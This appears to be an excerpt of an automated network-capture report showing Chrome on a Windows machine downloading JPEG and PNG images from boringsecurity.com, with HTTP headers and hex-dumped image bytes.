                                                                          2023-12-10 16:44:51 UTC10674INData Raw: 48 73 43 da 6a 10 c1 32 83 b8 ef 6c 89 f3 19 4e f2 66 d5 22 ae 0d e8 1b c9 89 89 c9 73 5e 90 8b dc 16 8e 00 20 48 53 e1 2c 9b 73 25 56 c2 59 97 d8 ea 83 7b 48 b3 10 d7 34 9a c4 95 8d 04 84 af c8 1a 4a 70 73 76 a9 56 af 5f 7f ed bd 37 ae d3 d6 06 f0 fd 78 91 45 8a 5b b2 77 db a4 ab f2 c0 34 55 b5 b1 d9 80 73 cf 3d f7 dc c5 cf 7d 76 bd b8 7b b5 f6 da 9f 68 fc f9 de 1b ef bc 57 a7 db ad 25 38 cc 70 fa 15 db 1a 9c 28 e4 ba 51 fc c7 b6 e6 15 e2 cc 1e 1a 61 e4 43 0d 49 4d 7c c4 e9 8c 25 51 91 d8 e8 33 18 d8 e1 50 3d 1b 1f a6 50 b4 28 39 10 7e 58 25 b1 be be 42 09 0e 9c 06 21 38 12 04 df 9e 7a ea 85 17 28 bf d1 f8 ea 4b 5f 8d 76 57 b7 1e fe d2 93 97 59 35 1c 13 e1 2e 9f 3a 7f 2e 46 b8 2f 1e d0 b8 4d 19 4e 53 e2 76 d6 00 7e 4d 28 ee 8f 1f 07 d8 bd bd c3 39 8e 5e
                                                                          Data Ascii: HsCj2lNf"s^ HS,s%VY{H4JpsvV_7xE[w4Us=}v{hW%8p(QaCIM|%Q3P=P(9~X%B!8z(K_vWY5.:.F/MNSv~M(9^


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          100192.168.2.54983375.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:50 UTC634OUTGET /images/grill.jpg HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://boringsecurity.com/_next/static/css/ad4aef9984e4c1fd.css
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:51 UTC396INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 67 65 3a 20 35 30 39 32 35 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 68 69 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 37 39 34 30 34 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 6a 70 65 67 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 35 31 20 47 4d 54 0d 0a 45 74 61 67 3a 20 22 39 63 39 66 36 65 30 33 65 35 66 64 34 63 61 39 61 32 39 64 33 61 39 63 35 37
                                                                          Data Ascii: HTTP/1.1 200 OKAccept-Ranges: bytesAge: 50925Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitContent-Length: 179404Content-Type: image/jpegDate: Sun, 10 Dec 2023 16:44:51 GMTEtag: "9c9f6e03e5fd4ca9a29d3a9c57
                                                                          2023-12-10 16:44:51 UTC790INData Raw: ff d8 ff e1 00 16 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 0d 00 00 ff e1 03 1f 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 37 2e 31 2d 63 30 30 30 20 37 39 2e 39 63 63 63 34 64 65 39 33 2c 20 32 30 32 32 2f 30 33 2f 31 34 2d 31 34 3a 30 37 3a 32 32 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78
                                                                          Data Ascii: ExifMM*Duckyhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.9ccc4de93, 2022/03/14-14:07:22 "> <rdf:RDF x
                                                                          2023-12-10 16:44:51 UTC2372INData Raw: 44 65 73 63 72 69 70 74 69 6f 6e 3e 20 3c 2f 72 64 66 3a 52 44 46 3e 20 3c 2f 78 3a 78 6d 70 6d 65 74 61 3e 20 3c 3f 78 70 61 63 6b 65 74 20 65 6e 64 3d 22 72 22 3f 3e ff ed 00 48 50 68 6f 74 6f 73 68 6f 70 20 33 2e 30 00 38 42 49 4d 04 04 00 00 00 00 00 0f 1c 01 5a 00 03 1b 25 47 1c 02 00 00 02 00 02 00 38 42 49 4d 04 25 00 00 00 00 00 10 fc e1 1f 89 c8 b7 c9 78 2f 34 62 34 07 58 77 eb ff ee 00 21 41 64 6f 62 65 00 64 c0 00 00 00 01 03 00 10 03 02 03 06 00 00 59 04 00 01 57 25 00 02 bc cc ff db 00 84 00 13 10 10 18 11 18 26 17 17 26 30 25 1e 25 30 2c 25 24 24 25 2c 3b 33 33 33 33 33 3b 43 3e 3e 3e 3e 3e 3e 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 01 14 18 18 1f 1b 1f 25 18 18 25 34 25 1f 25 34 43 34 29 29 34
                                                                          Data Ascii: Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>HPhotoshop 3.08BIMZ%G8BIM%x/4b4Xw!AdobedYW%&&0%%0,%$$%,;33333;C>>>>>>CCCCCCCCCCCCCCCCCCCCCCCCCCCCC%%4%%4C4))4
                                                                          2023-12-10 16:44:51 UTC538INData Raw: 94 9a 42 42 91 10 e3 e2 6e a3 01 55 04 4a 6c 21 21 48 89 63 38 9b 9f a0 a6 8d 26 61 90 81 a8 04 9b 74 97 9f a6 22 9e 26 69 10 81 a8 05 13 74 97 9e 40 a2 a1 27 76 99 36 54 00 73 b4 93 5c 60 22 b0 27 a7 0c 93 aa 00 46 8e 24 26 98 08 b1 42 2a c6 11 75 22 72 ea c2 36 1b 45 22 d4 88 af 18 43 d4 e1 a8 b0 48 da 4e 10 9b 90 26 9d 61 07 51 c3 23 bd 64 8f e7 93 2a e4 0b 71 b0 f3 f9 e4 32 2f 41 24 b4 8d 04 8b b5 20 31 a4 41 cf 30 e2 f4 67 26 a8 68 21 1b 50 76 bf 48 35 cc 3a 4f 42 72 7b 17 41 e7 f5 8a 38 69 e2 12 6b 40 9a f4 13 da b7 10 75 40 6a ea c2 23 37 0a 45 c8 11 5e 30 87 a9 13 53 60 91 b0 da 25 36 a4 45 3a 64 5d 47 1b 3d 78 48 d2 60 85 d8 a1 2e 32 23 ea 38 e9 eb c2 56 91 88 0a d4 2c db a4 9c f2 32 7a b0 99 a4 42 06 a0 14 4d d2 5e 79 00 9a 70 9d da 44 f9 50 0b
                                                                          Data Ascii: BBnUJl!!Hc8&at"&it@'v6Ts\`"'F$&B*u"r6E"CHN&aQ#d*q2/A$ 1A0g&h!PvH5:OBr{A8ik@u@j#7E^0S`%6E:d]G=xH`.2#8V,2zBM^ypDP
                                                                          2023-12-10 16:44:51 UTC4744INData Raw: 0c 19 35 53 1d 4c f4 92 e1 88 f5 b4 04 39 6c 0a 7a 50 75 09 79 2f 16 0f 53 40 4b 96 d3 13 42 4d 72 9c 4d db a3 90 f5 8a 7a 9a 0a 9e a0 98 0d 25 dd d1 c8 a1 22 e8 4b 85 ad ea 0c b0 c9 8b 88 6c f4 a0 17 a5 e2 96 e5 8c ee 22 73 c2 1b 3d 28 18 e9 1a 1a 73 0a b6 63 33 55 c5 60 2a 36 89 48 a1 1c 05 07 23 8c e5 71 58 02 83 a2 43 1f 3f 09 49 4a c3 09 3c 56 bc 48 74 48 c1 a9 c1 2a d9 4c e3 47 15 ab 50 32 88 da 31 23 85 7d 31 18 e9 b8 ad 5a 81 ce 8d e1 28 30 b3 11 c7 3a 5d 2b 4e a0 a1 91 d2 72 d5 c5 b8 90 09 f1 91 5a 35 05 47 15 60 8a 38 b8 56 a0 df 13 0a 91 c8 2b 38 6c 07 26 e2 e1 19 c6 d1 03 8a 11 89 2d d8 aa 04 a4 e2 e1 d8 8a 1f 05 03 92 0a 2e d8 de 61 c7 c5 c2 50 94 ba 0a 86 25 6b 2f e9 58 63 62 e2 f5 9c 25 4d 82 c3 54 91 2f e9 b4 d7 43 a5 ca 28 ca d9 05 a6 2d
                                                                          Data Ascii: 5SL9lzPuy/S@KBMrMz%"Kl"s=(sc3U`*6H#qXC?IJ<VHtH*LGP21#}1Z(0:]+NrZ5G`8V+8l&-.aP%k/Xcb%MT/C(-
                                                                          2023-12-10 16:44:51 UTC5930INData Raw: 7a 22 a5 84 f8 1a 59 39 48 5a cf 3b d1 14 13 71 e8 80 ce 32 8f 3d c5 73 6c c5 c7 e7 7a 02 7a 5e 3d 10 e8 c7 53 e7 50 51 3f 4e 5c 70 58 2f 64 e3 d1 59 f9 e5 14 f9 d5 0d 9f 12 5e 51 3c 13 8f 8f 41 4d f3 ca 68 f3 ab 0d 00 b2 fd 94 c1 6c 7c 7a 08 6c 25 2f f3 ec 39 2b 12 fc 47 18 e8 f4 b9 07 21 4b a0 b0 15 a7 8b b1 22 73 e3 32 b9 ca 72 87 43 58 00 ae 2e 05 ac da 23 32 99 c9 25 0d 8a 90 31 5c 58 02 90 a8 90 ca 26 25 94 32 37 81 aa e2 c5 72 02 a6 46 0e 9f 40 a0 e5 60 26 9e 2b 56 a0 2a 64 60 c4 f0 94 94 c4 0b 13 c5 69 d4 87 44 8d 09 59 85 5d 3e 98 d4 71 5a 09 25 39 33 c3 c4 ac b0 00 83 e9 74 a3 45 43 fa 47 0c e5 a4 b0 12 d0 fa 5e 28 21 49 46 4a e1 9a a4 96 02 98 1e c9 a3 cb 27 2a 19 9e 1e a5 25 82 b3 0f 63 21 c7 93 15 84 d4 9a 53 ac ab 07 46 e4 66 35 9d 21 6a 51
                                                                          Data Ascii: z"Y9HZ;q2=slzz^=SPQ?N\pX/dY^Q<AMhl|zl%/9+G!K"s2rCX.#2%1\X&%27rF@`&+V*d`iDY]>qZ%93tECG^(!IFJ'*%c!SFf5!jQ
                                                                          2023-12-10 16:44:51 UTC7116INData Raw: 50 36 1b 63 1b 6f 9f e8 1e 77 76 1e 8c 95 46 2a e8 aa 0a 1b 25 1f 54 56 1e 7e e6 9e 97 9f 74 22 ef 86 c0 63 aa 72 87 cd 41 03 03 4f 47 cf be 00 6f 82 d1 52 d0 92 a3 4b 48 9a b2 2e 82 f8 0c be 0b 89 90 e5 95 76 69 1b d4 65 70 dd 09 b6 c5 69 22 d8 05 40 42 4c f5 34 74 76 48 6d 91 d6 48 26 25 4a 60 13 d0 96 87 2d 73 1b 4c f4 92 61 61 4a 5c a1 34 25 a6 cf 4a 02 72 9c 4b db a3 d0 f5 0a 7a 9c 0a 68 48 4c 06 92 ee e8 f9 e8 48 ba 12 e1 6b 7a 83 2c 32 62 e2 1b 3d 28 05 e9 78 a5 b9 63 3b 88 9c f0 86 cf 4a 06 3a 46 86 9c c2 ad 98 ce e5 71 58 0a 8d a2 52 29 9f 80 a0 e4 71 9c ae 2b 00 50 54 c8 63 d1 82 52 52 b0 c3 47 15 af 90 32 88 d8 39 18 25 45 29 9c 73 f1 58 74 e3 9d 1b 86 24 44 b3 a6 23 9b 2f 16 ab 66 28 6c 54 84 a5 61 76 4f c6 ba 3d 2d 56 ca 54 c8 6c 39 73 f1 7e
                                                                          Data Ascii: P6cowvF*%TV~t"crAOGoRKH.viepi"@BL4tvHmH&%J`-sLaaJ\4%JrKzhHLHkz,2b=(xc;J:FqXR)q+PTcRRG29%E)sXt$D#/f(lTavO=-VTl9s~
                                                                          2023-12-10 16:44:51 UTC8302INData Raw: 9e 12 45 c2 36 9c 05 0c 71 2b 98 90 46 9e 15 c5 a2 09 f8 0a 5a d2 57 9a 01 ca b0 56 11 93 93 f0 14 b5 a4 af 24 83 95 60 b1 23 27 37 08 2a 71 93 b8 94 2f aa c0 16 4d 26 63 40 00 a6 73 28 1d 11 cf 48 5c dd 26 e2 33 53 4a 85 b4 5a 4f cf 49 ba dd 26 ed 69 8a a5 20 38 58 4f cf 48 58 ed 27 ee 70 0b a5 00 3c 58 4d ad 00 81 fc 23 71 c0 2e 94 00 fc 61 37 30 43 5b f8 41 0b c5 05 33 98 ee 32 6e 66 0c 45 22 21 81 40 90 a6 73 9b a6 4b c7 a3 27 a9 62 5c ba 09 f2 89 cd 61 19 27 11 8c 9a b4 8a 7a a8 27 ca 27 0f 58 44 9d ad 0e 6b 27 17 52 28 25 ca 10 33 1d a4 bb 8f 36 6b 26 02 b4 52 45 ce 58 d5 d1 84 c4 34 19 3d b2 03 5a 69 21 e6 80 f4 54 04 cc 0a 40 45 92 19 5a 9e 45 cc c1 f3 56 b2 76 ae a1 2a ae 53 5e 2e 22 e3 d1 f2 5a 91 0f 4d 42 17 54 c6 b7 58 47 c4 63 65 b1 02 9e aa
                                                                          Data Ascii: E6q+FZWV$`#'7*q/M&c@s(H\&3SJZOI&i 8XOHX'p<XM#q.a70C[A32nfE"!@sK'b\a'z''XDk'R(%36k&REX4=Zi!T@EZEVv*S^."ZMBTXGce
                                                                          2023-12-10 16:44:51 UTC6118INData Raw: 73 52 14 2e 8d 0b 8b d0 83 d0 68 50 83 6a 14 56 5e f9 1c cb 76 1c 3b 1a e5 1d 34 a9 dd 6d 42 4f 41 a3 42 4d a8 54 14 0d a6 e6 65 db a8 6e 69 94 14 c8 fd 96 8e 5c 84 03 46 84 eb 50 8d d0 1d 37 2a 68 fd 55 87 7c bc a6 56 ec 1d 8d 30 40 34 9c b0 ab 9e 7e b5 d2 72 0d 1c a8 2b db 29 33 dd bf 0c 4d 30 5e ba 6e 58 51 c9 3f 5a e9 b9 e6 8e 40 28 0e 52 53 33 70 1b 97 c1 7a e4 7e c1 d8 b1 e8 a3 4d ce a3 91 ba 03 91 8a 17 7e 01 5e d8 02 99 5b 90 c4 be 08 06 9b 93 a8 c7 9f ad 72 31 05 dc 80 57 b6 1c a6 0d f8 62 5f 04 0b a6 e4 8a 31 27 eb 5d 36 20 d1 c8 05 01 ca 4c f1 6e 01 05 f0 5e b9 1c 90 ec 58 fd 6a 34 d8 ea 39 1b a0 39 58 a1 66 e0 11 db 32 76 5c 8b dc ea 27 46 c8 9c 06 4e cb 91 4b 90 a1 b1 04 1c 13 a6 aa 75 39 17 f0 e9 ca e4 4e e4 27 7f 80 39 dd 7a 6a 27 46 c8 9c
                                                                          Data Ascii: sR.hPjV^v;4mBOABMTeni\FP7*hU|V0@4~r+)3M0^nXQ?Z@(RS3pz~M~^[r1Wb_1']6 Ln^Xj499Xf2v\'FNKu9N'9zj'F
                                                                          2023-12-10 16:44:51 UTC10674INData Raw: 74 89 e2 9f b3 69 fe ad 52 78 03 8d fe 12 df 80 38 c4 03 a6 49 0f fb 36 91 ea 6d c9 df e6 1f a9 72 55 40 e3 11 ce 99 2c ad fb 37 fb a2 78 d6 3c 9c 87 a3 55 8a a8 00 62 32 37 65 ff 00 a2 7f 3a 0c 78 b9 ec da 27 ab 5d 88 50 38 df 90 7b 7e bf fd 23 9d 06 25 6c 7b 3e f3 b7 56 f4 93 c0 fc 65 3d 0d 1b aa 81 c6 23 9d 16 2e b4 3d db 79 9b 8d e9 62 4e 9b 74 6b 31 44 03 8d c6 9b f7 56 25 c9 fc ef 33 1e 3d 2c 59 b4 1b a3 fa 18 aa 01 c6 fc 82 1f 95 3c b1 20 1d e7 72 cb e8 62 ef bc cd d5 bd 4c 40 1f 8c a4 a1 a3 f5 5c 47 3a 0e 5d 2a c5 df 79 5b 83 ea 62 77 f9 a6 df 5b 59 8a 20 1c 6e 34 9b ba b3 17 63 f9 de 56 3c 7a 58 b3 68 b7 47 f4 31 54 00 0d fe 10 fc a9 25 89 1c ef 3b 96 5f 41 ec fb ce dd 5b d2 c4 28 fc 60 4a 97 6e 17 8c 47 3a 2c 59 6a 7b be f3 9e 0f a0 9d fe 65 3d
                                                                          Data Ascii: tiRx8I6mrU@,7x<Ub27e:x']P8{~#%l{>Ve=#.=ybNtk1DV%3=,Y< rbL@\G:]*y[bw[Y n4cV<zXhG1T%;_A[(`JnG:,Yj{e=


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          101192.168.2.54983475.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:50 UTC414OUTGET /_ipx/w_256,q_75/%2Fimages%2Flogo.png?url=%2Fimages%2Flogo.png&w=256&q=75 HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:51 UTC413INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 67 65 3a 20 35 30 39 32 34 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 68 69 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 37 36 36 34 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 70 6e 67 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 35 31 20 47 4d 54 0d 0a 45 74 61 67 3a 20 22 36 63 31 30 2d
                                                                          Data Ascii: HTTP/1.1 200 OKAge: 50924Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitContent-Length: 27664Content-Security-Policy: default-src 'none'Content-Type: image/pngDate: Sun, 10 Dec 2023 16:44:51 GMTEtag: "6c10-
                                                                          2023-12-10 16:44:51 UTC773INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 01 00 08 03 00 00 00 6b ac 58 54 00 00 00 bd 50 4c 54 45 4c 69 71 8f 8e 8b 2e 2a 24 37 33 2c 87 84 81 69 68 61 6c 6d 67 2f 2b 2c 4b 49 42 51 4c 48 4f 4e 47 af ae a9 2c 29 22 b0 ac a6 22 24 23 1c 1f 1e 24 26 24 20 22 21 1e 21 1f 26 28 27 19 1c 1b 29 2a 28 28 2b 2c 5c 62 66 2c 2e 2e 43 46 46 11 10 0e 45 4a 4c 38 3c 3e 16 17 15 3c 40 41 4a 4e 50 4d 52 56 62 67 6b 58 5d 61 7c 81 84 83 88 8a 52 58 5c 89 8e 91 75 7b 7e 2f 32 34 6a 6e 6f 8e 94 98 71 75 76 94 9a 9e 3d 43 47 34 38 39 9a 9f a2 9c a3 a9 54 56 55 a3 a7 aa ac b0 b3 a6 ab b0 66 70 7b 62 62 5f b2 b5 b9 b9 bd c1 c3 c8 cc 79 86 94 54 60 6e d3 d7 da eb ee f0 a7 b4 c1 8c e6 58 64 00 00 00 0e 74 52 4e 53 00 c0 76 a7 70 9a cf 14 58 32 d5 fb da
                                                                          Data Ascii: PNGIHDRkXTPLTELiq.*$73,ihalmg/+,KIBQLHONG,)""$#$&$ "!!&(')*((+,\bf,..CFFEJL8<><@AJNPMRVbgkX]a|RX\u{~/24jnoquv=CG489TVUfp{bb_yT`nXdtRNSvpX2
                                                                          2023-12-10 16:44:51 UTC2372INData Raw: 87 c9 a8 4f ff 17 42 c3 cb e7 df ef 3f 86 f6 92 a6 a9 d6 1a a6 5f d1 0f be fe b4 f0 54 f0 59 db 33 c7 52 79 33 e8 17 cd a9 d4 e9 a9 69 8a a2 2c ca a2 2a ab aa 12 69 d9 cb f4 22 de c6 7f 79 33 f8 fa 69 bd df df d2 be 4f 61 f5 f8 04 4f 8f 1d b0 ab c7 5e c0 cc f1 65 ac 18 06 80 0d c0 eb 44 7b 50 c2 47 36 55 53 96 05 f6 a0 11 a2 11 69 01 af b0 11 6f d3 6c 3e fd eb 86 85 97 cf 9f ce 3f 86 cb 7b 25 34 af fe e7 e1 93 1f b4 b1 4f d0 a6 f0 c6 58 1f 50 c1 ff 8b 92 ee 83 dd 0d 5c 85 1c 37 a1 49 f1 75 38 84 46 34 fd 5b fb 56 7f fa ed e5 5f d6 f6 cd 45 8b ca 9e 3d bf ac cb e7 c3 af 04 5b 82 86 27 ac d2 5e 97 d7 f4 d4 94 f0 8a 58 f1 09 cb b5 17 a3 69 9a 02 46 50 96 d5 09 0e a1 28 ca a6 a8 7a 38 8a b7 e1 5f f0 26 bc 7c fe 76 fb 31 bc b5 a9 a6 73 e7 d3 4f d9 02 e0 f3 78
                                                                          Data Ascii: OB?_TY3Ry3i,*i"y3iOaO^eD{PG6USiol>?{%4OXP\7Iu8F4[V_E=['^XiFP(z8_&|v1sOx
                                                                          2023-12-10 16:44:51 UTC538INData Raw: b9 08 5f 51 e4 52 20 74 83 20 f0 90 e7 ba 6e c4 07 ea 07 d8 0f 22 8a c2 98 12 e6 30 70 dd 00 4b 05 6f 88 6f 0d 10 fe 82 d0 0b d8 1b 24 09 fe 90 e7 45 bb 83 1c 7b 94 53 f3 3c df 6c 10 0b 8a bc 52 7f c7 1d f8 fa fb fd 4d 13 fc fd 08 82 bd 32 a5 cd 7a 77 ae 0f 83 45 ae 1b 76 99 77 ad a5 94 75 8b 97 6c f5 de 49 b2 2e dc f4 ad 94 b2 ef 65 db eb 22 f3 93 20 ee db be c7 0f ad b5 be ee 5d c7 cb fa 5e 27 4e 78 ed b5 2e 82 24 f6 e2 30 76 8a b6 df bb 8e 1f 6d ae 57 fa 73 54 2d b8 66 70 0d 59 e0 c5 31 c5 90 30 f4 82 5d f7 36 f4 84 09 ad 17 00 65 aa fe 6e 7e e0 e5 d3 8f b7 4b fb cc 7f c8 fd 55 d2 e4 f6 fa 47 81 ef c5 0e c1 3a f8 be d8 9c a7 69 34 66 18 cc 34 8d 93 d9 87 5d 78 5d 97 79 9a ce a3 99 ce d3 34 d5 5d 10 76 cb 80 d7 38 1a 63 8c 52 57 df 3f 8e 6f 2a db 15 67
                                                                          Data Ascii: _QR t n"0pKoo$E{S<lRM2zwEvwulI.e" ]^'Nx.$0vmWsT-fpY10]6en~KUG:i4f4]x]y4]v8cRW?o*g
                                                                          2023-12-10 16:44:51 UTC4744INData Raw: b1 81 4f b7 81 88 ef 27 03 98 36 ba 6e 6c ea 13 01 a4 22 20 85 38 fc e4 b5 3b 76 59 3d 8c af 5b 4a dc a3 dd d6 0c 43 16 d4 66 b8 44 5b e6 fa 77 5b 3d 4c 62 7b 1c 8c 71 b6 01 bc db 6e 5b 29 75 dd be 1a 65 60 01 f5 75 77 91 f2 ea 7b 71 e6 d2 06 bc 8e 72 dc db 6f a6 97 4b e4 89 8f 30 10 7a 94 40 11 8b 10 44 87 be 02 6f 4e b1 b0 6c f2 4d 71 ad f4 ff 3c 2f f8 7c 9f 2e 92 88 7f 5b f7 af 2a 5d da cc 37 0a 2c 1e 01 b7 13 32 01 d0 d5 66 dc 07 5d 1c 66 71 1c e7 93 31 8e a3 86 a1 d8 c2 61 85 89 93 b9 62 18 c4 f6 75 52 26 71 33 22 c4 7c 61 8c d8 be 2a a9 b2 a8 31 4a 6f bb b6 ad 8b 20 f4 fc 8b 51 a7 ed c1 d4 a3 13 e1 ac 91 50 76 1d 90 24 81 61 3f 8e 41 ab c6 c4 25 21 51 8c 5e 2f 57 2d 38 1a 36 f4 a9 a9 fe c7 99 d1 e7 e5 d6 56 fd e5 49 fa 61 fd 7d c3 f5 4d 98 bf 87 b4
                                                                          Data Ascii: O'6nl" 8;vY=[JCfD[w[=Lb{qn[)ue`uw{qroK0z@DoNlMq</|.[*]7,2f]fq1abuR&q3"|a*1Jo QPv$a?A%!Q^/W-86VIa}M
                                                                          2023-12-10 16:44:51 UTC5930INData Raw: 22 95 fb e0 75 17 05 28 1e 51 21 8c 4d 0b 90 10 ad 47 dc 56 41 04 1e ed 00 6c c0 77 de db a2 c4 45 c2 7f 79 f3 17 e8 d1 17 35 49 e8 a1 08 91 69 a1 2f a4 84 f3 60 d1 f1 aa cd 00 00 20 00 49 44 41 54 fa 9c fe 32 e6 c7 9a 61 04 61 92 1d c3 18 37 3e 43 9d 98 fc 1c 71 33 54 f2 24 c5 0e f9 44 62 3f e8 dd 39 89 63 5b c6 02 2f 0a b3 1c a7 4f c5 77 ba d8 d5 64 c6 d6 94 ad 54 35 4e 1f 23 f6 d2 aa 28 21 21 42 36 dc d6 50 17 3c 53 e4 22 3a c6 bb 08 54 39 22 80 43 3c b3 4d b0 b9 46 80 20 08 09 62 c6 06 00 13 c8 e5 69 bf d9 9f 4e 64 02 7f 49 46 fc 79 9d 58 10 8e 8f 5e 33 0a 0e 38 06 86 5d 17 13 12 20 25 3f 79 3d ce 75 b8 1e 14 7a 89 e3 65 d4 f1 8a 76 58 db 02 45 69 1b 65 6d d4 05 4c 45 1d 06 c2 54 cf 78 2d e1 dc b5 10 0d 5c 7b 55 0d 4a a5 6b d3 d4 ad c1 dc 98 53 71 3a
                                                                          Data Ascii: "u(Q!MGVAlwEy5Ii/` IDAT2aa7>Cq3T$Db?9c[/OwdT5N#(!!B6P<S":T9"C<MF biNdIFyX^38] %?y=uzevXEiemLETx-\{UJkSq:
                                                                          2023-12-10 16:44:51 UTC7116INData Raw: b1 17 40 1c 40 91 60 59 a6 65 bd f5 62 fc 26 41 86 60 8f fd 18 97 80 85 41 b0 f2 18 07 40 08 8c da 92 a9 83 e0 c9 0a 30 36 78 d6 87 61 01 fe 5b 9f d2 8c 29 20 c1 0d 6d 00 59 80 bd 05 05 e8 00 d4 ad b9 c0 4a 57 c9 8e c3 21 19 2c 31 b1 5e 8c 84 c7 c9 a8 20 4f f9 20 cd 2b a0 0b 00 f5 53 96 2a a3 4d 5b 4f 83 51 b2 14 48 82 8d 6a af 74 c8 f3 0c 9a 94 c6 ee da c1 ba 14 1e f1 3f c2 c6 13 6c 64 9a 41 a0 9a 79 be 01 13 9d 87 f6 a8 be 3f da 23 69 a3 a8 1e 00 a0 61 3b c5 f9 bd d1 81 d0 e9 23 20 58 96 06 27 f6 87 16 4a 10 44 b4 01 05 69 c5 20 93 28 71 05 be b4 ef f6 79 b7 65 53 9e e0 03 92 8c a8 2e 6e cc e6 2e 24 8b 02 f0 05 9a 05 8e 8d c8 42 f4 6b 5a b1 3a de 14 9e 00 82 37 78 6c eb be 96 3d 4d 0f 33 7d d5 cf eb 59 d6 f2 3a 4e d8 00 d3 c2 12 28 13 80 57 c4 d0 b5 01
                                                                          Data Ascii: @@`Yeb&A`A@06xa[) mYJW!,1^ O +S*M[OQHjt?ldAy?#ia;# X'JDi (qyeS.n.$BkZ:7xl=M3}Y:N(W
